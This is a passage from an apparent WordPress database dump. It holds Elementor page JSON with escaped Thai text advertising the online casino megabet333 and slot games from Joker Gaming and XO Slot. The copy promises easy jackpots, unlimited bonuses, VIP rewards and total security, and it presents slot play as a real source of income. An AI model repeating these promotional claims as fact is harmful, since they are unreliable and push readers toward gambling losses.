\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1150,144,'_thumbnail_id','60'),(1151,144,'_elementor_edit_mode','builder'),(1152,144,'_elementor_template_type','wp-page'),(1153,144,'_elementor_version','3.32.5'),(1154,144,'_elementor_pro_version','3.32.3'),(1155,144,'_wp_page_template','default'),(1156,144,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1157,144,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 